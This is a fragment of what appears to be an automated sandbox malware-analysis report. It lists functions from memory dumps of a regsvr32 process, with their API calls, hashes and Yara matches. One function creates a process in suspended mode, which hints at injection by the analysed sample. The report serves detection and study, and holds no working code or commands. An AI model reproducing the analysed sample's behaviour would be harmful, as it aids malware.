                          Download Yara Rule
                          APIs
                          • GetCurrentProcess.KERNEL32(?), ref: 7F07BDA9
                          • IsWow64Process.KERNEL32(00000000), ref: 7F07BDB0
                          • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 7F07BDEC
                          • wsprintfW.USER32 ref: 7F07BE7A
                          • CloseHandle.KERNEL32(00000000), ref: 7F07C005
                          • CloseHandle.KERNEL32(00000000), ref: 7F07C010
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.2233819943.000000007F020000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F020000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7f020000_regsvr32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$CloseHandle$CreateCurrentWow64wsprintf
                          • String ID: 0x%x$?
                          • API String ID: 3386633596-4137330559
                          • Opcode ID: de5137729ffe807bdf05267a7f30571bfd0d58a5b5e1c73bf0b34b869567014a
                          • Instruction ID: 666c201b514ee1edb0cff9d03ec4e8e7834a6f14ad1a66b07b61e565bcb14594
                          • Opcode Fuzzy Hash: de5137729ffe807bdf05267a7f30571bfd0d58a5b5e1c73bf0b34b869567014a
                          • Instruction Fuzzy Hash: 89810FB2E00208BFEF119AA5CD85FFEB7BDEF04A54F1440A5E505E6250EB35AE508B74
                          Function 6C3F8480 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 168COMMON
                          Download Yara Rule
                          APIs
                          • _ValidateLocalCookies.LIBCMT ref: 6C3F84B7
                          • ___except_validate_context_record.LIBVCRUNTIME ref: 6C3F84BF
                          • _ValidateLocalCookies.LIBCMT ref: 6C3F8548
                          • __IsNonwritableInCurrentImage.LIBCMT ref: 6C3F8573
                          • _ValidateLocalCookies.LIBCMT ref: 6C3F85C8
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.2233507615.000000006C3D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C3D0000, based on PE: true
                          • Associated: 00000009.00000002.2233472664.000000006C3D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000009.00000002.2233547351.000000006C403000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000009.00000002.2233588519.000000006C411000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000009.00000002.2233738983.000000006C879000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000009.00000002.2233777208.000000006C87B000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_6c3d0000_regsvr32.jbxd
                          Similarity
                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                          • String ID: csm$csm$v?l
                          • API String ID: 1170836740-1277278303
                          • Opcode ID: 3118a5e01be20abd8d376cb64510d1aa8d8775a1ecaf66f4d7ca5adc300072e3
                          • Instruction ID: 4b9c5f4de6d2bcbeebfca44e99613ece0931390d87c9b9d68f7ee079a2f18bb9
                          • Opcode Fuzzy Hash: 3118a5e01be20abd8d376cb64510d1aa8d8775a1ecaf66f4d7ca5adc300072e3
                          • Instruction Fuzzy Hash: 9351C134A012089FCF09DF6AC840E9EBBB5AF4631CF14895AD8285BB51C732D906CF92
                          Function 7F07DB5F Relevance: 10.6, APIs: 7, Instructions: 136COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • __RTC_Initialize.LIBCMT ref: 7F07DBA6
                          • ___scrt_uninitialize_crt.LIBCMT ref: 7F07DBC0
                          Memory Dump Source
                          • Source File: 00000009.00000002.2233819943.000000007F020000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F020000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7f020000_regsvr32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Initialize___scrt_uninitialize_crt
                          • String ID:
                          • API String ID: 2442719207-0
                          • Opcode ID: 86a424639953870e78fd03c622a3a672c876b19e194d977c522aca57102aad78
                          • Instruction ID: de39a53e96234b31ea8963f0855c3071acb073fc516c4dee27c8f50c952624d6
                          • Opcode Fuzzy Hash: 86a424639953870e78fd03c622a3a672c876b19e194d977c522aca57102aad78
                          • Instruction Fuzzy Hash: 00412872D06319EFDF118F69CC00B9E7AB6EB80E60F104199E8156B340DF745D029BB8
                          Function 7F090C9C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • FreeLibrary.KERNEL32(00000000,?,7F090DA9,7F08DD78,0000000C,7F0A2040,00000000,00000000,?,7F090FF6,00000021,FlsSetValue,7F0AA8C0,7F0AA8C8,7F0A2040), ref: 7F090D5D
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.2233819943.000000007F020000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F020000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7f020000_regsvr32.jbxd
                          Yara matches
                          Similarity
                          • API ID: FreeLibrary
                          • String ID: api-ms-$ext-ms-
                          • API String ID: 3664257935-537541572
                          • Opcode ID: 2b9e8b81384e468e4eff9d8a24b0b2a869037f525d082f84b7ed5ac0a5a576af
                          • Instruction ID: 2a06c5d8b600f43208108672cb5ecb8dbf8ae839cfb323f1c7c8a43e27b56a8e
                          • Opcode Fuzzy Hash: 2b9e8b81384e468e4eff9d8a24b0b2a869037f525d082f84b7ed5ac0a5a576af
                          • Instruction Fuzzy Hash: 9F21C97FA02615ABD722D675DC40B8A37A6FF45B74F241110E916AB3C0E734F910E6D4
                          Function 7F08BEB5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 64COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • GetStdHandle.KERNEL32(000000F4,?,00003C16), ref: 7F08BED5
                          • GetFileType.KERNEL32(00000000,?,00003C16), ref: 7F08BEE7
                          • swprintf.LIBCMT ref: 7F08BF08
                          • WriteConsoleW.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,00003C16), ref: 7F08BF45
                          Strings
                          • Assertion failed: %Ts, file %Ts, line %d, xrefs: 7F08BEFD
                          Memory Dump Source
                          • Source File: 00000009.00000002.2233819943.000000007F020000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F020000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7f020000_regsvr32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ConsoleFileHandleTypeWriteswprintf
                          • String ID: Assertion failed: %Ts, file %Ts, line %d
                          • API String ID: 2943507729-1719349581
                          • Opcode ID: e5d19083bc952091418a11624c2b189a2e0abb6a84e209a83a7430f4059a5091
                          • Instruction ID: 2828caf244ea608c6248ee2567ad628cb3f4035553917b57c64da7ecb6fafce3
                          • Opcode Fuzzy Hash: e5d19083bc952091418a11624c2b189a2e0abb6a84e209a83a7430f4059a5091
                          • Instruction Fuzzy Hash: 6F1108BA600218AFCB109F29CC44EDF73BDDF44A14F604598EA1A97381DB30AD558F64
                          Function 7F035BE0 Relevance: 7.6, APIs: 5, Instructions: 91COMMON
                          Download Yara Rule
                          APIs
                          • std::_Lockit::_Lockit.LIBCPMT ref: 7F035C07
                          • int.LIBCPMTD ref: 7F035C20
                            • Part of subcall function 7F03AD10: std::_Lockit::_Lockit.LIBCPMT ref: 7F03AD26
                            • Part of subcall function 7F03AD10: std::_Lockit::~_Lockit.LIBCPMT ref: 7F03AD50
                          • Concurrency::cancel_current_task.LIBCPMTD ref: 7F035C67
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 7F035CFB
                          Memory Dump Source
                          • Source File: 00000009.00000002.2233819943.000000007F020000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F020000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7f020000_regsvr32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                          • String ID:
                          • API String ID: 3053331623-0
                          • Opcode ID: f125b31944e3cb28cd573373d4d67ff7b36cf42d00a4dac95e6bfce4409a695f
                          • Instruction ID: 2086891d08f0feeaf3b0d7205779f8fbc9710daa248cee6b10efc47f6e7e1e1e
                          • Opcode Fuzzy Hash: f125b31944e3cb28cd573373d4d67ff7b36cf42d00a4dac95e6bfce4409a695f
                          • Instruction Fuzzy Hash: 9241B5B5D00609DFCB05CF98D980BEEBBB5FF48714F208269E915A7390DB346A41CBA5
                          Function 7F07DC0F Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.2233819943.000000007F020000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F020000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7f020000_regsvr32.jbxd
                          Yara matches
                          Similarity
                          • API ID: dllmain_raw$dllmain_crt_dispatch
                          • String ID:
                          • API String ID: 3136044242-0
                          • Opcode ID: 2a57b206bc82de30e87434ceb91e4bc3ec2765b7489d0a2388ed800d574d9405
                          • Instruction ID: d225f64866ef6c09f51dced4890ea76863164507f78e0b0faa626230a0f67358
                          • Opcode Fuzzy Hash: 2a57b206bc82de30e87434ceb91e4bc3ec2765b7489d0a2388ed800d574d9405
                          • Instruction Fuzzy Hash: 1D218671D06359AFDF128F55CC40AAF3ABAEB80E90F014195F8056B314DF719D129BB8
                          Function 7F081BF2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,7F081BA3,00000000,?,00000001,?,?,?,7F081C92,00000001,FlsFree,7F0A7E5C,FlsFree), ref: 7F081BFF
                          • GetLastError.KERNEL32(?,7F081BA3,00000000,?,00000001,?,?,?,7F081C92,00000001,FlsFree,7F0A7E5C,FlsFree,00000000,?,7F080BAF), ref: 7F081C09
                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 7F081C31
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.2233819943.000000007F020000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F020000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7f020000_regsvr32.jbxd
                          Yara matches
                          Similarity
                          • API ID: LibraryLoad$ErrorLast
                          • String ID: api-ms-
                          • API String ID: 3177248105-2084034818
                          • Opcode ID: bf7891ddb7af1cbc1d78dbf9ae6927ee80af8ecc64dbd22b62f39b6e2c23996c
                          • Instruction ID: 2f4b9f3b62bfe06f0ea91c7ed5654f83aea85b29ec03af1eb3ef585c93b03317
                          • Opcode Fuzzy Hash: bf7891ddb7af1cbc1d78dbf9ae6927ee80af8ecc64dbd22b62f39b6e2c23996c
                          • Instruction Fuzzy Hash: 46E01279644308BAEB111EA1DC05F493BAAAF10F64F648020F90DA93E0D776A430A584
                          Function 7F080BBA Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.2233819943.000000007F020000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F020000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7f020000_regsvr32.jbxd
                          Yara matches
                          Similarity
                          • API ID: AdjustPointer
                          • String ID:
                          • API String ID: 1740715915-0
                          • Opcode ID: aff36731d46eb2b8f677f26ba1e0c23ff033939957b4b9090273156a0103a0d4
                          • Instruction ID: 8fde9d439e71b576b26d07e029e858fd49f889929f5a00fa4239ca7c344b50a3
                          • Opcode Fuzzy Hash: aff36731d46eb2b8f677f26ba1e0c23ff033939957b4b9090273156a0103a0d4
                          • Instruction Fuzzy Hash: 5351BD76A01306AFEB268F10D990BAA77F6FF04B10F504529EC0787390DB71A891C791
                          Function 7F08CB33 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.2233819943.000000007F020000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F020000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7f020000_regsvr32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3e36dc1e4eafd5d0a9e498b3df4bb9d022bb6a18f3249abcd046099e5c14e4ef
                          • Instruction ID: d10246d47918454b694af09a7abaa96dca0f29c9a4dbf45eb0891e069660eba5
                          • Opcode Fuzzy Hash: 3e36dc1e4eafd5d0a9e498b3df4bb9d022bb6a18f3249abcd046099e5c14e4ef
                          • Instruction Fuzzy Hash: 19218B35204B25EFC7029F75DC90E5A77BAEF40A64B00C529E916AB350EB30EC5097A0
                          Function 7F085FE5 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 291COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.2233819943.000000007F020000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F020000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7f020000_regsvr32.jbxd
                          Yara matches
                          Similarity
                          • API ID: __aulldiv
                          • String ID: +$-
                          • API String ID: 3732870572-2137968064
                          • Opcode ID: 2a5dda8db05bb586d1cdf0733098455f9d565910d00a04444795233169bd683b
                          • Instruction ID: 1c16fb2cac7c377adddc9891c7e7f8d64fb7f9cf98c3ba6d49d334be5eaa717f
                          • Opcode Fuzzy Hash: 2a5dda8db05bb586d1cdf0733098455f9d565910d00a04444795233169bd683b
                          • Instruction Fuzzy Hash: 91A1B278A01359DECF15CE74C8506EE7FB2EF45B24F068699D862AB382D634ED01CB50
                          Function 7F053D10 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 209COMMON
                          Download Yara Rule
                          APIs
                          • std::exception::exception.LIBCONCRTD ref: 7F053FC8
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.2233819943.000000007F020000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F020000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7f020000_regsvr32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::exception::exception
                          • String ID: parse error$parse_error
                          • API String ID: 2807920213-1820534363
                          • Opcode ID: 51c74a272bbbe00c84e424741cb3d6cf2aa36e098719bf44ac21f546af0cbaa4
                          • Instruction ID: 0ff00310e035e337f99f0e9afe50fc11c5ef8d4a382db60b41d3b49d0dd2cc1a
                          • Opcode Fuzzy Hash: 51c74a272bbbe00c84e424741cb3d6cf2aa36e098719bf44ac21f546af0cbaa4
                          • Instruction Fuzzy Hash: C8A1CEB4D04258DFDB14CFA8C990AEEBBB1FF49700F208199E559AB351DB70AA45CF90
                          Function 7F037D80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81COMMON
                          Download Yara Rule
                          APIs
                          • std::_Lockit::_Lockit.LIBCPMT ref: 7F037DA3
                          • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 7F037E6F
                            • Part of subcall function 7F07CB02: _Yarn.LIBCPMT ref: 7F07CB21
                            • Part of subcall function 7F07CB02: _Yarn.LIBCPMT ref: 7F07CB45
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.2233819943.000000007F020000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F020000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7f020000_regsvr32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                          • String ID: bad locale name
                          • API String ID: 1908188788-1405518554
                          • Opcode ID: 22d4fcd920408d71afebf535d2ef0a3a73a8a09ca7faca3241691df819d7eecf
                          • Instruction ID: c4fe3bea1dacefc4f54bc5db365c7efb00c697a4af58a0c8a85371399511300f
                          • Opcode Fuzzy Hash: 22d4fcd920408d71afebf535d2ef0a3a73a8a09ca7faca3241691df819d7eecf
                          • Instruction Fuzzy Hash: 484116B4D05289DFDB01CF98C954BAEFBF1BF49304F148198D414AB381C77A9A01CBA5